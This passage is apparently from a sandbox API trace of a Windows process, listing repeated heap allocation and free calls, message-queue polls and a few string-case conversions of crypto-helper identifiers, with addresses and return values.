returned 0x7da1d8 [0040.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0040.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17d10) returned 0xac2018 [0040.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0040.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0040.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0040.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0040.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da148 [0040.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0040.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0040.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0040.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1a8 [0040.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0040.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0040.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0040.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c778 [0040.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0040.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0040.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0040.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0040.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0040.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x17d10) returned 0x94cd20 [0040.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0040.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0040.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0040.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0040.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0040.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0040.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0040.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0040.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0040.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0040.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0040.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0040.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0040.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0040.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0040.814] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0040.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0040.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0040.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0040.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0040.814] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0040.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0040.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0040.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0040.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0040.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0040.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0040.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0040.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0040.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0040.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0040.815] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0040.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0040.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0040.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da248 [0040.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0040.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0040.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0040.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0040.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889688 [0040.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0040.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0040.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0040.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0040.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0040.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0040.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0040.815] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0040.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0040.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0040.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0040.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0040.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0040.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0040.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0040.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0040.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0040.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0040.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0040.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0040.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0040.816] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0040.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0040.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0040.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0040.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0040.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0040.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0040.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0040.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0040.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0040.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0040.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0040.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0040.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0040.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0040.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0040.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0040.816] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0040.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0040.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0040.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0040.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0040.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0040.816] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.817] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0040.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0040.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0040.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0040.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0040.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0040.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0040.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0040.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0040.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0040.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0040.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0040.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0040.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0040.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0040.817] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0040.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0040.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0040.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0040.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0040.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0040.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0040.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0040.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0040.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0040.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0040.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0040.818] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0040.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd00 [0040.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0040.818] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0040.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0040.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0040.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0040.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0040.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0040.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0040.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0040.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0040.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0040.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0040.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0040.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0040.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0040.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0040.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0040.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0040.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0040.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0040.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0040.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0040.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0040.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0040.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0040.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0040.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0040.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0040.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0040.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0040.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0040.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0040.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0040.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0040.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0040.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0040.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0040.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0040.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0040.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0040.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0040.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0040.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0040.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0040.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0040.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0040.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0040.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0040.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0040.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0040.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0040.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0040.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0040.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0040.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0040.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0040.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0040.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0040.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0040.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0040.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0040.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0040.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0040.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0040.821] HeapFree (in: hHeap=0x770000, 